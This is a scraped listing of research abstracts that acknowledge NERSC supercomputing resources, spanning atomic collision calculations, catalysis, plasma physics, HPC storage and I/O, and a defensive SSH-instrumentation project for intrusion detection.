    When conducting an examination of distant astronomical objects, scientists rely on measurements derived from astronomical observations of these objects, which are primarily collected using spectroscopy. In order to interpret spectroscopic data collected on astronomical objects, it is necessary to have a background of accurate dynamical information on interstellar molecules at one’s disposal. Seeing as most of the observable infrared radiation in the universe is emitted by molecules excited by collisional processes in the interstellar gas, generating accurate data on the rate of molecular collisions is of salient interest to astronomical endeavors.The collisional system we will be focusing on here is He-HD, an atom-diatom system in which He collides with HD. We are primarily interested in the cooling capabilities of this system, as these species are predicted to have played an important role in the formation of primordial stars, which emerged from a background composed solely of Hydrogen, Helium, and their compounds. HD is being investigated because it has a finite dipole moment and is hence a powerful radiator, and He due to its relative abundance in the early universe. Using a hybrid OpenMP/MPI adaption (vrrm) of a public-domain scattering package, cross sections for He-HD collisions are computed for a swathe of both rotational and vibrational states across a range of relevant kinetic energies, then integrated to produce rate coefficients. Due to the vast computational requirements for performing these operations, the use of high-powered computational resources is necessary.The work of CV was funded by a UGA Center for Undergraduate Research Opportunities award. We thank the University of Georgia GACRC and NERSC at Lawrence-Berkeley for computational resources and Brendan McLaughlin for assistance.

  20. Visualizing staggered fields and analyzing electromagnetic data with PerceptEM

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shasharina, Svetlana

    This project resulted in VSimSP: a software for simulating large photonic devices of high-performance computers. It includes: GUI for Photonics Simulations; High-Performance Meshing Algorithm; 2d Order Multimaterials Algorithm; Mode Solver for Waveguides; 2d Order Material Dispersion Algorithm; S Parameters Calculation; High-Performance Workflow at NERSC ; and Large Photonic Devices Simulation Setups We believe we became the only company in the world which can simulate large photonics devices in 3D on modern supercomputers without the need to split them into subparts or do low-fidelity modeling. We started commercial engagement with a manufacturing company.

  1. Investigation of energetic particle induced geodesic acoustic mode

    NASA Astrophysics Data System (ADS)

    Schneller, Mirjam; Fu, Guoyong; Chavdarovski, Ilija; Wang, Weixing; Lauber, Philipp; Lu, Zhixin

    2017-10-01

    Energetic particles are ubiquitous in present and future tokamaks due to heating systems and fusion reactions. Anisotropy in the distribution function of the energetic particle population is able to excite oscillations from the continuous spectrum of geodesic acoustic modes (GAMs), which cannot be driven by plasma pressure gradients due to their toroidally and nearly poloidally symmetric structures. These oscillations are known as energetic particle-induced geodesic acoustic modes (EGAMs) [G.Y. Fu'08] and have been observed in recent experiments [R. Nazikian'08]. EGAMs are particularly attractive in the framework of turbulence regulation, since they lead to an oscillatory radial electric shear which can potentially saturate the turbulence. For the presented work, the nonlinear gyrokinetic, electrostatic, particle-in-cell code GTS [W.X. Wang'06] has been extended to include an energetic particle population following either bump-on-tail Maxwellian or slowing-down [Stix'76] distribution function. With this new tool, we study growth rate, frequency and mode structure of the EGAM in an ASDEX Upgrade-like scenario. A detailed understanding of EGAM excitation reveals essential for future studies of EGAM interaction with micro-turbulence. Funded by the Max Planck Princeton Research Center. Computational resources of MPCDF and NERSC are greatefully acknowledged.

  2. National Storage Laboratory: a collaborative research project

    NASA Astrophysics Data System (ADS)

    Coyne, Robert A.; Hulen, Harry; Watson, Richard W.

    1993-01-01

    The grand challenges of science and industry that are driving computing and communications have created corresponding challenges in information storage and retrieval. An industry-led collaborative project has been organized to investigate technology for storage systems that will be the future repositories of national information assets. Industry participants are IBM Federal Systems Company, Ampex Recording Systems Corporation, General Atomics DISCOS Division, IBM ADSTAR, Maximum Strategy Corporation, Network Systems Corporation, and Zitel Corporation. Industry members of the collaborative project are funding their own participation. Lawrence Livermore National Laboratory through its National Energy Research Supercomputer Center (NERSC) will participate in the project as the operational site and provider of applications. The expected result is the creation of a National Storage Laboratory to serve as a prototype and demonstration facility. It is expected that this prototype will represent a significant advance in the technology for distributed storage systems capable of handling gigabyte-class files at gigabit-per-second data rates. Specifically, the collaboration expects to make significant advances in hardware, software, and systems technology in four areas of need, (1) network-attached high performance storage; (2) multiple, dynamic, distributed storage hierarchies; (3) layered access to storage system services; and (4) storage system management.

  3. Nuclear-Recoil Differential Cross Sections for the Two Photon Double Ionization of Helium

    NASA Astrophysics Data System (ADS)

    Abdel Naby, Shahin; Ciappina, M. F.; Lee, T. G.; Pindzola, M. S.; Colgan, J.

    2013-05-01

    In support of the reaction microscope measurements at the free-electron laser facility at Hamburg (FLASH), we use the time-dependent close-coupling method (TDCC) to calculate fully differential nuclear-recoil cross sections for the two-photon double ionization of He at photon energy of 44 eV. The total cross section for the double ionization is in good agreement with previous calculations. The nuclear-recoil distribution is in good agreement with the experimental measurements. In contrast to the single-photon double ionization, maximum nuclear recoil triple differential cross section is obtained at small nuclear momenta. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California and the National Institute for Computational Sciences in Knoxville, Tennessee.

  4. Tuning HDF5 subfiling performance on parallel file systems

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Byna, Suren; Chaarawi, Mohamad; Koziol, Quincey

    Subfiling is a technique used on parallel file systems to reduce locking and contention issues when multiple compute nodes interact with the same storage target node. Subfiling provides a compromise between the single shared file approach that instigates the lock contention problems on parallel file systems and having one file per process, which results in generating a massive and unmanageable number of files. In this paper, we evaluate and tune the performance of recently implemented subfiling feature in HDF5. In specific, we explain the implementation strategy of subfiling feature in HDF5, provide examples of using the feature, and evaluate andmore » tune parallel I/O performance of this feature with parallel file systems of the Cray XC40 system at NERSC (Cori) that include a burst buffer storage and a Lustre disk-based storage. We also evaluate I/O performance on the Cray XC30 system, Edison, at NERSC. Our results show performance benefits of 1.2X to 6X performance advantage with subfiling compared to writing a single shared HDF5 file. We present our exploration of configurations, such as the number of subfiles and the number of Lustre storage targets to storing files, as optimization parameters to obtain superior I/O performance. Based on this exploration, we discuss recommendations for achieving good I/O performance as well as limitations with using the subfiling feature.« less

  5. First-principles characterization of formate and carboxyl adsorption on the stoichiometric CeO2(111) and CeO2(110) surfaces

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mei, Donghai

    2013-05-20

    Molecular adsorption of formate and carboxyl on the stoichiometric CeO2(111) and CeO2(110) surfaces was studied using periodic density functional theory (DFT+U) calculations. Two distinguishable adsorption modes (strong and weak) of formate are identified. The bidentate configuration is more stable than the monodentate adsorption configuration. Both formate and carboxyl bind at the more open CeO2(110) surface are stronger. The calculated vibrational frequencies of two adsorbed species are consistent with experimental measurements. Finally, the effects of U parameters on the adsorption of formate and carboxyl over both CeO2 surfaces were investigated. We found that the geometrical configurations of two adsorbed species aremore » not affected by using different U parameters (U=0, 5, and 7). However, the calculated adsorption energy of carboxyl pronouncedly increases with the U value while the adsorption energy of formate only slightly changes (<0.2 eV). The Bader charge analysis shows the opposite charge transfer occurs for formate and carboxyl adsorption where the adsorbed formate is negatively charge whiled the adsorbed carboxyl is positively charged. Interestingly, with the increasing U parameter, the amount of charge is also increased. This work was supported by the Laboratory Directed Research and Development (LDRD) project of the Pacific Northwest National Laboratory (PNNL) and by a Cooperative Research and Development Agreement (CRADA) with General Motors. The computations were performed using the Molecular Science Computing Facility in the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL), which is a U.S. Department of Energy national scientific user facility located at PNNL in Richland, Washington. Part of the computing time was also granted by the National Energy Research Scientific Computing Center (NERSC)« less

  6. Instrumented SSH

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Campbell, Scott; Campbell, Scott

    NERSC recently undertook a project to access and analyze Secure Shell (SSH) related data. This includes authentication data such as user names and key fingerprints, interactive session data such as keystrokes and responses, and information about noninteractive sessions such as commands executed and files transferred. Historically, this data has been inaccessible with traditional network monitoring techniques, but with a modification to the SSH daemon, this data can be passed directly to intrusion detection systems for analysis. The instrumented version of SSH is now running on all NERSC production systems. This paper describes the project, details about how SSH was instrumented,more » and the initial results of putting this in production.« less

  7. Extreme I/O on HPC for HEP using the Burst Buffer at NERSC

    NASA Astrophysics Data System (ADS)

    Bhimji, Wahid; Bard, Debbie; Burleigh, Kaylan; Daley, Chris; Farrell, Steve; Fasel, Markus; Friesen, Brian; Gerhardt, Lisa; Liu, Jialin; Nugent, Peter; Paul, Dave; Porter, Jeff; Tsulaia, Vakho

    2017-10-01

    In recent years there has been increasing use of HPC facilities for HEP experiments. This has initially focussed on less I/O intensive workloads such as generator-level or detector simulation. We now demonstrate the efficient running of I/O-heavy analysis workloads on HPC facilities at NERSC, for the ATLAS and ALICE LHC collaborations as well as astronomical image analysis for DESI and BOSS. To do this we exploit a new 900 TB NVRAM-based storage system recently installed at NERSC, termed a Burst Buffer. This is a novel approach to HPC storage that builds on-demand filesystems on all-SSD hardware that is placed on the high-speed network of the new Cori supercomputer. We describe the hardware and software involved in this system, and give an overview of its capabilities, before focusing in detail on how the ATLAS, ALICE and astronomical workflows were adapted to work on this system. We describe these modifications and the resulting performance results, including comparisons to other filesystems. We demonstrate that we can meet the challenging I/O requirements of HEP experiments and scale to many thousands of cores accessing a single shared storage system.

  8. Electronic and steric influences of pendant amine groups on the protonation of molybdenum bis (dinitrogen) complexes

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Labios, Liezel A.; Heiden, Zachariah M.; Mock, Michael T.

    2015-05-04

    The synthesis of a series of P EtP NRR' (P EtP NRR' = Et₂PCH₂CH₂P(CH₂NRR')₂, R = H, R' = Ph or 2,4-difluorophenyl; R = R' = Ph or iPr) diphosphine ligands containing mono- and disubstituted pendant amine groups, and the preparation of their corresponding molybdenum bis(dinitrogen) complexes trans-Mo(N₂)₂(PMePh₂)₂(P EtP NRR') is described. In situ IR and multinuclear NMR spectroscopic studies monitoring the stepwise addition of (HOTf) to trans-Mo(N₂)₂(PMePh₂)₂(P EtP NRR') complexes in THF at -40 °C show that the electronic and steric properties of the R and R' groups of the pendant amines influence whether the complexes are protonated atmore » Mo, a pendant amine, a coordinated N2 ligand, or a combination of these sites. For example, complexes containing mono-aryl substituted pendant amines are protonated at Mo and pendant amine to generate mono- and dicationic Mo–H species. Protonation of the complex containing less basic diphenyl-substituted pendant amines exclusively generates a monocationic hydrazido (Mo(NNH₂)) product, indicating preferential protonation of an N₂ ligand. Addition of HOTf to the complex featuring more basic diisopropyl amines primarily produces a monocationic product protonated at a pendant amine site, as well as a trace amount of dicationic Mo(NNH₂) product that contain protonated pendant amines. In addition, trans-Mo(N₂)₂(PMePh₂)₂(depe) (depe = Et₂PCH₂CH₂PEt₂) without a pendant amine was synthesized and treated with HOTf, generating a monocationic Mo(NNH₂) product. Protonolysis experiments conducted on select complexes in the series afforded trace amounts of NH₄⁺. Computational analysis of the series of trans-Mo(N₂)₂(PMePh₂)₂(P EtP NRR') complexes provides further insight into the proton affinity values of the metal center, N₂ ligand, and pendant amine sites to rationalize the differing reactivity profiles. This research was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy, Office of Science, Office of Basic Energy Sciences. Computational resources provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for the U.S. Department of Energy.« less

  9. Catalytic N 2 Reduction to Silylamines and Thermodynamics of N 2 Binding at Square Planar Fe

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Prokopchuk, Demyan E.; Wiedner, Eric S.; Walter, Eric D.

    The geometric constraints imposed by a tetradentate P 4N 2 ligand play an essential role in stabilizing square planar Fe complexes with changes in metal oxidation state. A combination of high-pressure electrochemistry and variable temperature UV-vis spectroscopy were used to obtain these thermodynamic measurements, while X-ray crystallography, 57Fe Mössbauer spectroscopy, and EPR spectroscopy were used to fully characterize these new compounds. Analysis of Fe 0, FeI, and FeII complexes reveals that the free energy of N 2 binding across three oxidation states spans more than 37 kcal mol -1. The square pyramidal Fe0(N 2)(P 4N 2) complex catalyzes the conversionmore » of N 2 to N(SiR 3) 3 (R = Me, Et) at room temperature, representing the highest turnover number (TON) of any Fe-based N 2 silylation catalyst to date (up to 65 equiv N(SiMe 3) 3 per Fe center). Elevated N 2 pressures (> 1 atm) have a dramatic effect on catalysis, increasing N 2 solubility and the thermodynamic N 2 binding affinity at Fe0(N 2)(P 4N 2). Acknowledgment. This research was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (DOE), Office of Science, Office of Basic Energy Sciences. EPR experiments were performed using EMSL, a national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located at Pacific Northwest National Laboratory (PNNL). PNNL is operated by Battelle for the U.S. DOE. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. The authors thank Prof. Yisong Alex Guo at Carnegie Mellon University for recording Mössbauer data for some complexes and Emma Wellington and Kaye Kuphal for their assistance with the collection of Mössbauer data at Colgate University, Dr. Katarzyna Grubel for X-ray assistance, and Dr. Rosalie Chu for mass spectrometry assistance. The authors also thank Dr. Aaron Appel and Dr. Alex Kendall for helpful discussions.« less

  10. A classical reactive potential for molecular clusters of sulphuric acid and water

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Stinson, Jake L.; Kathmann, Shawn M.; Ford, Ian J.

    2015-10-12

    We present a two state empirical valence bond (EVB) potential describing interactions between sulphuric acid and water molecules and designed to model proton transfer between them within a classical dynamical framework. The potential has been developed in order to study the properties of molecular clusters of these species, which are thought to be relevant to atmospheric aerosol nucleation. The particle swarm optimisation method has been used to fit the parameters of the EVB model to density functional theory (DFT) calculations. Features of the parametrised model and DFT data are compared and found to be in satisfactory agreement. In particular, itmore » is found that a single sulphuric acid molecule will donate a proton when clustered with four water molecules at 300 K and that this threshold is temperature dependent. SMK was supported in part by the U.S. Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences, and Biosciences; JLS and IJF were supported by the IMPACT scheme at University College London (UCL). We acknowledge the UCL Legion High Performance Computing Facility, and associated support services together with the resources of the National Energy Research Scientific Computing Center (NERSC), which is supported by the U.S. Department of Energy under Contract No. DE-AC02- 05CH11231. JLS thanks Dr. Gregory Schenter, Dr. Theo Kurtén and Prof. Hanna Vehkamäki for important guidance and discussions.« less

  11. Challenges in scaling NLO generators to leadership computers

    NASA Astrophysics Data System (ADS)

    Benjamin, D.; Childers, JT; Hoeche, S.; LeCompte, T.; Uram, T.

    2017-10-01

    Exascale computing resources are roughly a decade away and will be capable of 100 times more computing than current supercomputers. In the last year, Energy Frontier experiments crossed a milestone of 100 million core-hours used at the Argonne Leadership Computing Facility, Oak Ridge Leadership Computing Facility, and NERSC. The Fortran-based leading-order parton generator called Alpgen was successfully scaled to millions of threads to achieve this level of usage on Mira. Sherpa and MadGraph are next-to-leading order generators used heavily by LHC experiments for simulation. Integration times for high-multiplicity or rare processes can take a week or more on standard Grid machines, even using all 16-cores. We will describe our ongoing work to scale the Sherpa generator to thousands of threads on leadership-class machines and reduce run-times to less than a day. This work allows the experiments to leverage large-scale parallel supercomputers for event generation today, freeing tens of millions of grid hours for other work, and paving the way for future applications (simulation, reconstruction) on these and future supercomputers.

  12. Inner-shell photoionization of atomic chlorine near the 2p-1 edge: a Breit-Pauli R-matrix calculation

    NASA Astrophysics Data System (ADS)

    Felfli, Z.; Deb, N. C.; Manson, S. T.; Hibbert, A.; Msezane, A. Z.

    2009-05-01

    An R-matrix calculation which takes into account relativistic effects via the Breit-Pauli (BP) operator is performed for photoionization cross sections of atomic Cl near the 2p threshold. The wavefunctions are constructed with orbitals generated from a careful large scale configuration interaction (CI) calculation with relativistic corrections using the CIV3 code of Hibbert [1] and Glass and Hibbert [2]. The results are contrasted with the calculation of Martins [3], which uses a CI with relativistic corrections, and compared with the most recent measurements [4]. [1] A. Hibbert, Comput. Phys. Commun. 9, 141 (1975) [2] R. Glass and A. Hibbert, Comput. Phys. Commun. 16, 19 (1978) [3] M. Martins, J. Phys. B 34, 1321 (2001) [4] D. Lindle et al (private communication) Research supported by U.S. DOE, Division of Chemical Sciences, NSF and CAU CFNM, NSF-CREST Program. Computing facilities at Queen's University of Belfast, UK and of DOE Office of Science, NERSC are appreciated.

  13. Photoionization of Li2

    NASA Astrophysics Data System (ADS)

    Li, Y.; Pindzola, M. S.; Ballance, C. P.; Colgan, J.

    2014-05-01

    Single and double photoionization cross sections for Li2 are calculated using a time-dependent close-coupling method. The correlation between the outer two electrons of Li2 is obtained by relaxation of the close-coupled equations in imaginary time. Propagation of the close-coupled equations in real time yields single and double photoionization cross sections for Li2. The two active electron cross sections are compared with one active electron distorted-wave and close-coupling results for both Li and Li2. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

  14. Simulating contrast inversion in atomic force microscopy imaging with real-space pseudopotentials

    NASA Astrophysics Data System (ADS)

    Lee, Alex; Sakai, Yuki; Chelikowsky, James

    Atomic force microscopy measurements have reported contrast inversions for systems such as Cu2N and graphene that can hamper image interpretation and characterization. Here, we apply a simulation method based on ab initio real-space pseudopotentials to gain an understanding of the tip-sample interactions that influence the inversion. We find that chemically reactive tips induce an attractive binding force that results in the contrast inversion. The inversion is tip height dependent and not observed when using less reactive CO-functionalized tips. Work is supported by the DOE under DOE/DE-FG02-06ER46286 and by the Welch Foundation under Grant F-1837. Computational resources were provided by NERSC and XSEDE.

  15. Flux-driven turbulence GDB simulations of the IWL Alcator C-Mod L-mode edge compared with experiment

    NASA Astrophysics Data System (ADS)

    Francisquez, Manaure; Zhu, Ben; Rogers, Barrett

    2017-10-01

    Prior to predicting confinement regime transitions in tokamaks one may need an accurate description of L-mode profiles and turbulence properties. These features determine the heat-flux width upon which wall integrity depends, a topic of major interest for research aid to ITER. To this end our work uses the GDB model to simulate the Alcator C-Mod edge and contributes support for its use in studying critical edge phenomena in current and future tokamaks. We carried out 3D electromagnetic flux-driven two-fluid turbulence simulations of inner wall limited (IWL) C-Mod shots spanning closed and open flux surfaces. These simulations are compared with gas puff imaging (GPI) and mirror Langmuir probe (MLP) data, examining global features and statistical properties of turbulent dynamics. GDB reproduces important qualitative aspects of the C-Mod edge regarding global density and temperature profiles, within reasonable margins, and though the turbulence statistics of the simulated turbulence follow similar quantitative trends questions remain about the code's difficulty in exactly predicting quantities like the autocorrelation time A proposed breakpoint in the near SOL pressure and the posited separation between drift and ballooning dynamics it represents are examined This work was supported by DOE-SC-0010508. This research used resources of the National Energy Research Scientific Computing Center (NERSC).

  16. In Situ Fabrication of PtCo Alloy Embedded in Nitrogen-Doped Graphene Nanopores as Synergistic Catalyst for Oxygen Reduction Reaction

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Zhong, Xing; Wang, Lei; Zhou, Hu

    A novel PtCo alloy in situ etched and embedded in graphene nanopores (PtCo/NPG) as a high-performance catalyst for ORR was reported. Graphene nanopores were fabricated in situ while forming PtCo nanoparticles that were uniformly embedded in the graphene nanopores. Given the synergistic effect between PtCo alloy and nanopores, PtCo/NPG exhibited 11.5 times higher mass activity than that of the commercial Pt/C cathode electrocatalyst. DFT calculations indicated that the nanopores in NPG cannot only stabilize PtCo nanoparticles but can also definitely change the electronic structures, thereby change its adsorption abilities. This enhancement can lead to a favorable reaction pathway on PtCo/NPGmore » for ORR. This study showed that PtCo/NPG is a potential candidate for the next generation of Pt-based catalysts in fuel cells. This study also offered a promising alternative strategy and enabled the fabrication of various kinds of metal/graphene nanopore nanohybrids with potential applications in catalysts and potential use for other technological devices. The authors acknowledge the financial support from the National Basic Research Program (973 program, No. 2013CB733501), Zhejiang Provincial Education Department Research Program (Y201326554) and the National Natural Science Foundation of China (No. 21306169, 21101137, 21136001, 21176221 and 91334013). D. Mei acknowledges the support from the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC).« less

  17. Spectroscopy of organic semiconductors from first principles

    NASA Astrophysics Data System (ADS)

    Sharifzadeh, Sahar; Biller, Ariel; Kronik, Leeor; Neaton, Jeffery

    2011-03-01

    Advances in organic optoelectronic materials rely on an accurate understanding their spectroscopy, motivating the development of predictive theoretical methods that accurately describe the excited states of organic semiconductors. In this work, we use density functional theory and many-body perturbation theory (GW/BSE) to compute the electronic and optical properties of two well-studied organic semiconductors, pentacene and PTCDA. We carefully compare our calculations of the bulk density of states with available photoemission spectra, accounting for the role of finite temperature and surface effects in experiment, and examining the influence of our main approximations -- e.g. the GW starting point and the application of the generalized plasmon-pole model -- on the predicted electronic structure. Moreover, our predictions for the nature of the exciton and its binding energy are discussed and compared against optical absorption data. We acknowledge DOE, NSF, and BASF for financial support and NERSC for computational resources.

  18. First-Principles Studies of the Excited States and Optical Properties of Xanthene Derivative Chromophores

    NASA Astrophysics Data System (ADS)

    Hamed, Samia; Sharifzadeh, Sahar; Neaton, Jeffrey

    2014-03-01

    Elucidation of the energy transfer mechanism in natural photosynthetic systems remains an exciting challenge. In particular, biomimetic protein-pigment complexes provide a unique study space in which individual parameters are adjusted and the impact of those changes captured. Here, we compute the excited state properties of a group of xanthene-derivative chromophores to be employed in the construction of new biomimetic light harvesting frameworks. Excitation energies, transition dipoles, and natural transition orbitals for the low-lying singlet and triplet states of these experimentally-relevant chromophores are obtained from first-principles density functional theory. The performance of several exchange-correlation functionals, including an optimally-tuned range-separated hybrid, are evaluated and compared with many body perturbation theory and experiment. Finally, we will discuss the implication of our results for the bottom-up design of new chromophores. This work is supported by the DOE and computational resources are provided by NERSC.

  19. Understanding Singlet and Triplet Excitons in Acene Crystals from First Principles

    NASA Astrophysics Data System (ADS)

    Rangel Gordillo, Tonatiuh; Sharifzadeh, Sahar; Kronik, Leeor; Neaton, Jeffrey

    2014-03-01

    Singlet fission, a process in which two triplet excitons are formed from a singlet exciton, has the potential to increase the solar cell efficiencies above 100%. Efficient singlet fission has been reported in larger acene crystals, such as tetracene and pentacene, in part attributable to their low-lying triplet energies. In this work, we use many-body perturbation theory within the GW approximation and the Bethe-Salpeter equation approach to compute quasiparticle gaps, low-lying singlet and and triplet excitations, and optical absorption spectra across the entire acene family of crystals, from benzene to hexacene. We closely examine the degree of localization and charge-transfer character of the low-lying singlets and triplets, and their sensitivity to crystal environment, and discuss implications for the efficiency of singlet fission in this systems. This work supported by DOE and computational resources provided by NERSC.

  20. Protonation Studies of a Tungsten Dinitrogen Complex Supported by a Diphosphine Ligand Containing a Pendant Amine

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Weiss, Charles J.; Egbert, Jonathan D.; Chen, Shentan

    2014-04-28

    Treatment of trans-[W(N2)2(dppe)(PEtNMePEt)] (dppe = Ph2PCH2CH2PPh2; PEtNMePEt = Et2PCH2N(Me)CH2PEt2) with three equivalents of tetrafluoroboric acid (HBF4∙Et2O) at -78 °C generated the seven-coordinate tungsten hydride trans-[W(N2)2(H)(dppe)(PEtNMePEt)][BF4]. Depending on the temperature of the reaction, protonation of a pendant amine is also observed, affording trans-[W(N2)2(H)(dppe)(PEtNMe(H)PEt)][BF4]2, with formation of the hydrazido complex, [W(NNH2)(dppe)(PEtNMe(H)PEt)][BF4]2, as a minor product. Similar product mixtures were obtained using triflic acid (HOTf). Upon acid addition to the carbonyl analogue, cis-[W(CO)2(dppe)(PEtNMePEt)], the seven-coordinate carbonyl-hydride complex, trans-[W(CO)2(H)(dppe)(PEtN(H)MePEt)][OTf]2 was generated. The mixed diphosphine complex without the pendant amine in the ligand backbone, trans-[W(N2)2(dppe)(depp)] (depp = Et2P(CH2)3PEt2), was synthesized and treated with HBF4∙Et2O, selectivelymore » generating a hydrazido complex, [W(NNH2)(F)(dppe)(depp)][BF4]. Computational analysis was used to probe proton affinity of three sites of protonation, the metal, pendant amine, and N2 ligand in these complexes. Room temperature reactions with 100 equivalents of HOTf produced NH4+ from reduction of the N2 ligand (electrons come from W). The addition of 100 equivalents HOTf to trans-[W(N2)2(dppe)(PEtNMePEt)] afforded 0.88 ± 0.02 equivalents NH4+, while 0.36 ± 0.02 equivalents of NH4+was formed upon treatment of trans-[W(N2)2(dppe)(depp)], the complex without the pendant amine. This work was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy Office of Science, Office of Basic Energy Sciences. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for DOE.« less

  1. First-principles quantum-mechanical investigations: The role of water in catalytic conversion of furfural on Pd(111)

    NASA Astrophysics Data System (ADS)

    Xue, Wenhua; Borja, Miguel Gonzalez; Resasco, Daniel E.; Wang, Sanwu

    2015-03-01

    In the study of catalytic reactions of biomass, furfural conversion over metal catalysts with the presence of water has attracted wide attention. Recent experiments showed that the proportion of alcohol product from catalytic reactions of furfural conversion with palladium in the presence of water is significantly increased, when compared with other solvent including dioxane, decalin, and ethanol. We investigated the microscopic mechanism of the reactions based on first-principles quantum-mechanical calculations. We particularly identified the important role of water and the liquid/solid interface in furfural conversion. Our results provide atomic-scale details for the catalytic reactions. Supported by DOE (DE-SC0004600). This research used the supercomputer resources at NERSC, of XSEDE, at TACC, and at the Tandy Supercomputing Center.

  2. Energy Efficient Supercomputing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Anypas, Katie

    2014-10-17

    Katie Anypas, Head of NERSC's Services Department discusses the Lab's research into developing increasingly powerful and energy efficient supercomputers at our '8 Big Ideas' Science at the Theater event on October 8th, 2014, in Oakland, California.

  3. Energy Efficient Supercomputing

    ScienceCinema

    Anypas, Katie

    2018-05-07

    Katie Anypas, Head of NERSC's Services Department discusses the Lab's research into developing increasingly powerful and energy efficient supercomputers at our '8 Big Ideas' Science at the Theater event on October 8th, 2014, in Oakland, California.

  4. Efficient Calculation of Exact Exchange Within the Quantum Espresso Software Package

    NASA Astrophysics Data System (ADS)

    Barnes, Taylor; Kurth, Thorsten; Carrier, Pierre; Wichmann, Nathan; Prendergast, David; Kent, Paul; Deslippe, Jack

    Accurate simulation of condensed matter at the nanoscale requires careful treatment of the exchange interaction between electrons. In the context of plane-wave DFT, these interactions are typically represented through the use of approximate functionals. Greater accuracy can often be obtained through the use of functionals that incorporate some fraction of exact exchange; however, evaluation of the exact exchange potential is often prohibitively expensive. We present an improved algorithm for the parallel computation of exact exchange in Quantum Espresso, an open-source software package for plane-wave DFT simulation. Through the use of aggressive load balancing and on-the-fly transformation of internal data structures, our code exhibits speedups of approximately an order of magnitude for practical calculations. Additional optimizations are presented targeting the many-core Intel Xeon-Phi ``Knights Landing'' architecture, which largely powers NERSC's new Cori system. We demonstrate the successful application of the code to difficult problems, including simulation of water at a platinum interface and computation of the X-ray absorption spectra of transition metal oxides.

  5. Exploring the Influence of Dynamic Disorder on Excitons in Solid Pentacene

    NASA Astrophysics Data System (ADS)

    Wang, Zhiping; Sharifzadeh, Sahar; Doak, Peter; Lu, Zhenfei; Neaton, Jeffrey

    2014-03-01

    A complete understanding of the spectroscopic and charge transport properties of organic semiconductors requires knowledge of the role of thermal fluctuations and dynamic disorder. We present a first-principles theoretical study aimed at understanding the degree to which dynamic disorder at room temperature results in energy level broadening and excited-state localization within bulk crystalline pentacene. Ab initio molecular dynamics simulations are well-equilibrated for 7-9 ps and tens of thousands of structural snapshots, taken at 0.5 fs intervals, provide input for many-body perturbation theory within the GW approximation and Bethe-Salpeter equation (BSE) approach. The GW-corrected density of states, including thousands of snapshots, indicates that thermal fluctuations significantly broaden the valence and conduction states by >0.2 eV. Additionally, we investigate the nature and energy of the lowest energy singlet and triplet excitons, computed for a set of uncorrelated and energetically preferred structures. This work supported by DOE; computational resources provided by NERSC.

  6. Single and Double Photoionization of Mg

    NASA Astrophysics Data System (ADS)

    Abdel-Naby, Shahin; Pindzola, M. S.; Colgan, J.

    2014-05-01

    Single and double photoionization cross sections for Mg are calculated using a time-dependent close-coupling method. The correlation between the two 3 s subshell electrons of Mg is obtained by relaxation of the close-coupled equations in imaginary time. An implicit method is used to propagate the close-coupled equations in real time to obtain single and double ionization cross sections for Mg. Energy and angle triple differential cross sections for double photoionization at equal energy sharing of E1 =E2 = 16 . 4 eV are compared with Elettra experiments and previous theoretical calculations. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

  7. Photoionization of Ne8+

    NASA Astrophysics Data System (ADS)

    Pindzola, M. S.; Abdel-Naby, Sh. A.; Robicheaux, F.; Colgan, J.

    2014-05-01

    Single and double photoionization cross sections for Ne8+ are calculated using a non-perturbative fully relativistic time-dependent close-coupling method. A Bessel function expansion is used to include both dipole and quadrupole effects in the radiation field interaction and the repulsive interaction between electrons includes both the Coulomb and Gaunt interactions. The fully correlated ground state of Ne8+ is obtained by solving a time-independent inhomogeneous set of close-coupled equations. Propagation of the time-dependent close-coupled equations yields single and double photoionization cross sections for Ne8+ at energies easily accessible at advanced free electron laser facilities. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

  8. Neutron-Impact Ionization of H and He

    NASA Astrophysics Data System (ADS)

    Lee, T.-G.; Ciappina, M. F.; Robicheaux, F.; Pindzola, M. S.

    2014-05-01

    Perturbative distorted-wave and non-perturbative close-coupling methods are used to study neutron-impact ionization of H and He. For single ionization of H, we find excellent agreement between the distorted-wave and close-coupling results at all incident energies. For double ionization of He, we find poor agreement between the distorted-wave and close-coupling results, except at the highest incident energies. We present the ratio of double to single ionization for He as a guide to experimental checks of theory at low energies and experimental confirmation of the rapid rise of the ratio at high energies. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California, NICS in Knoxville, Tennessee, and OLCF in Oak Ridge, Tennessee.

